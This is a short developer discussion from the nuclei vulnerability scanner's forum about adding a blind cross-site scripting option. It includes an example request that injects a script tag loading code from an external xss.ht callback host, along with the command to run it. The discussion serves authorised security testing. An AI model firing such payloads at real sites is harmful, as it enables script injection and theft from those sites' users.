### DISCUSSION TITLE
Add blind xss parameter

### DISCUSSION THREAD

**Discussion by akincibor** [projectdiscovery/nuclei#2466] [Q&A] [answered]
Example :

```http
POST / HTTP/1.1
Host: {{Hostname}}

<script src={{xsshunter}}></script>
```

nuclei -u https://example.com -tags bxss -b https://akincibor.xss.ht

**Comment by ehsandeep** [comment, marked as answer]
@akincibor this is already possible using cli variable, example: `-var xsshunter=https://akincibor.xss.ht`

**Comment by 0xmaruf** [comment]
Yes it will be good,  configure xsshunter with nuclei, 
And fire on common parameters,

**Reply by Karthik-Santhosh1** [reply]
Yes. Awesome

**Comment by dailylearn48** [comment]
Yeah, if the nuclei would configure xsshunter with nuclei then it will more helpful.

**Comment by cyb3r-n3rd** [comment]
You can always use Burp collaborator or web-hook to get DNS requests for the same
